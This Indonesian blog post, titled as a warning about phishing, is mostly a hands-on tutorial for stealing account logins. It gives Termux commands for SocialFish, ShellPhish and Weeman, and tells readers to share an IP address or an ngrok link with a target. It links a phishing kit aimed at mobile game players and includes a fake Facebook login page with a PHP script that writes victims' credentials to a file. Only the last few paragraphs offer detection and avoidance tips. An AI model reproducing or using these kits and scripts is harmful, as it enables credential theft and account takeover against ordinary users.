Bahaya Phising Mengintai Kita


Bahaya Phising Mengintai Kita - Pada kesempatan Kali ini kita akan membahas tentang Phising sebelum kita ke Materi ada baik-nya kita Mengetahui apa itu Phising, Hosting dan Cara Kerja Phising.

*Phising*
Phising Adalah Kegiatan Yang Berusah Membuat Korban Mengunjungi Situs Yang Salah Sehingga Memberikan Informasi Rahasia Berupa Username & Pasword Dll.Phising Bisa Juga Di Sebut Fake Login Yang Artinya Seseorang Login Dengan Situs Yang Salah.

*Hosting*
Hosting Adalah Tempat Data Yang Diperlukan Sebuah Website Dan Sehingga Bisa Di Akses Lewat Internet. Jadi bukan hanya Website-Website besar ataupun biasa saja ternyata Web Phising juga memerlukan Hosting yang bagus untuk memancing Target-nya.

*Cara Kerja Phising*
Cara Kerja Phising Adalah Seseorang Memasukan Username & Pasword Dari Situs Yang Palsu yang Kemudian data tersebut masuk ke database Seorang Phiser tersebut dan akan di Salah Gunakan.


Tools - tools yang paling sering di pakai untuk membuat Phising dari HP (Termux).

*SOCIAL FISH*
$ apt update
$ apt upgrade
$ pkg install git
$ pkg install python2
$ pkg install php
$ git clone https://github.com/UndeadSec/SocialFish
$ cd SocialFish
$ pip install -r requirements.txt
$ python2 SocialFish.py


*SHELLPHISH*
$ apt update && apt upgrade

Kemudian install dulu :
$ pkg install git
$ pkg install php

Kemudian cloning ShellPhish :
$ git clone https://github.com/thelinuxchoice/shellphish.git
$ ls
$ cd shellphish
$ ls
$ chmod +x 777 shellphis.sh
$ ls
$ bash shellphis.sh


*WEEMAN*
$ apt-get update
$ apt-get upgrade
$ pkg install python2
$ pkg install git
$ git clone https://github.com/evait-security/weeman.git
$ cd weeman
$ ls
$ python2 weeman.py

Cara menggunakan WEEMAN ==>

MASUK DULU KE TOOLSNYA :
$set url https://www.facebook.com
$set action_url https://www.facebook.com
$ show
buka new season (new tab) /lembar ke 2
$ ifconfig
jika slesai copy no addres yg tertera. jngn sampai salah karna ada 2 addres disitu. jika tdk tau yg
mna tanya.
stelah copy no adres.
buka lembar pertama lagi tulis
$ run
kasih adres tdi ke target.
contoh 125.25.175.88:8080 ingt hrus ksh port > :8080
_Format_
*IP punya kamu:8080*
```https://125.25.175.88:8080```
jika sudah dibuka dngn dia. saat dia login nnti.
email. pass. tertera. serta data" akun target....

Tambahan pake ngrok

Selanjutnya kita install ngrok dulu, daftar pada https://ngrok.com atau bisa juga

login menggunakan akun google atau register

Buka session baru lalu masuk pada folder penyimpanan hasil download tadi dan ekstrak file zip ngrok :
$ cd /sdcard/Download
$ unzip ngrok-stable-linux-arm.zip
$ mv -v ngrok $HOME
$ cd
$ chmod +x ngrok

*NOTE : Nama partisi sdcard berbeda tiap jenis phonsel . jadi sesuaikan saja

kebanyakan bernama /sdcard
$ termux-setup-storage

dan berikan ijin untuk mengakses sdcard

Lalu kita buka kembali website ngrok . dan copy authtoken nya dan pastekan ke termux
$ ./ngrok authtoken TOKENMU

Lanjut :
$ ./ngrok http 8080

COPY FORWADINGNYA DAN SEBAR

Tapi menurut saya pribadi paling mudah digunakan adalah SHELLPHISH
Tinggal ikuti step step nya kemudian jadi.

Adanya Phising Web doang Min?
Gak ko kami juga telah mencarikan Tools untuk Phising Game juga Seperti Mobile Legend dan Clash Of Clans dari Termux.

▪ Pastikan ada file PhisingGame, kalau belum ada nya
https://www118.zippyshare.com/v/JSZAdFiS/file.html
$ apt update && apt upgrade
$ wget https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-arm.zip
$ unzip ngrok-stable-linux-arm.zip
$ rm -rf ngrok-stable-linux-arm.zip
daftar akun ngrok dolo https://dashboard.ngrok.com/user/signup
dah tuh login https://dashboard.ngrok.com/user/login
kalau sudah selesai pergi ke Termux
$ ./ngrok -h
command -h untuk minta bantuan ~makan~
$ ./ngrok http 8080

ke new session
pindahkan file PhisingGame
$ cd /sdcard
$ cp -rf PhisingGame $HOME
$ cd
$ cd PhisingGame
$ python2 phising.py
Lalu salin link yang ada disitu
tinggal pilih
info lebih lanjut
$ cat Petunjuk.txt

Ikuti step by step dengan baik maka akan mendapatkan hasil yang baik pula,, JANAGAN NANYA KALO BELUM NYOBA!!


Contoh Membuat Web Phising di Pc dengan mudah Tanpa Coding ==>>
*Tutorial Kali Ini Membuat Phising Facebook Di Pc*

1.Buka http://www.facebook.com/login.php.

2.Klik Kanan,Lalu Pilih View Page Source.

3.Copy & Paste Script Yang Muncul Tersebut Pada Notepad.

4.Cari Kode "*action*"(Tanpa Tanda Kutip)Untuk Kita Modifikasi.

5.Pada Action="https://login.facebook.com/login.php", Ubahlah Menjadi Action="*secret_php*" Kemudian Ubah Juga Methode Dari "*POST*" Menjadi "*GET*".

6.Simpan File Tersebut Dengan Nama Index.Php Supaya Menjadi File PHP Bukan TXT,Pada Bagian Save As Type,Pilih All Files.

7.Sekarang Buka Lembaran Notepad Baru Dan Isikan Script Berikut:<?php
header("Location: http://www.Facebook.com/login.php ");
$handle = fopen("pass.txt", "a");
foreach($_GET as $variable =>$value)  {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

8.Simpan Dengan Nama File secret.php

9.Buka Notepad Lagi Dan Biarkan Isinya Kosong & Simpan Dengan Nama pass.txt

10.Upload Ketiga File Tersebut "index.php,secret.php,pass.txt" Ke Dalam Website Hosting Anda.

11.Kini Anda Sudah Berhasil Memiliki Sebuah Halaman Phising Facebook.

Note:Ketika Korban Memasukan Password Pada Halaman Tersebut,Maka Password Akan Terkirim Kedalam File pass.txt Yang Telah Anda Buat Sebelumnya.


Cara mengetahui bahwa web tersebut phing atau bukan Gimana bang?
Oke Cara mengetahui phising atu tidak
1.coba kalian input beberapa data ngawur aja bila berhasil login maka itu kemungkinan asli
2.Bisa juga dilihat dari script yg digunakan yg ada kata *post* berubah jadi *get*

Kan tadi cara mengetahui sebuah Web Phising atau tidak, Sekarang kita harus tau cara menghindari Phising
1.) Silahkan cek terlebih dahulu url yang dituju misalkan facebook.liker.tech nah itu jelas jelas palsu karena seharusnya url facebook adalah facebook.com.

2.) Jangan mudah ter iming - imingi oleh para phisher, jadi kalian jangan mudah ter iming - imingi oleh para phisher misalkan seorang phisher menyebarkan link phising Mobile Legends dengan mengiming - imingi skin gratis.


Jadi kita harus tetap hati - hati, ingatlah jika ada Kebaikan maka ada Kejahatan. Jangan di salah Gunakan ya Artikel di atas

Jangan Lupa Di Share Agar Teman Kita Tidak Ada Yang Terkena Phising, mengingat phising itu sangat berbahaya bagi perangkat Kita, Terutama diri Kita sendiri Karena dengan Phising Semua data kita dapat Dicuri.

Mau Jadi Blogger Sukses? Gabung Ke Groub Chat Kami Klik disini untuk Gabung
------------------
Thank's, Subscribe Now
------------------------------------------------------------------

(<ALMNZ7>)

Bahaya Phising Mengintai Kita Bahaya Phising Mengintai Kita Reviewed by anim _ers on September 08, 2018 Rating: 5

No comments:

Sponsored

loading...
Powered by Blogger.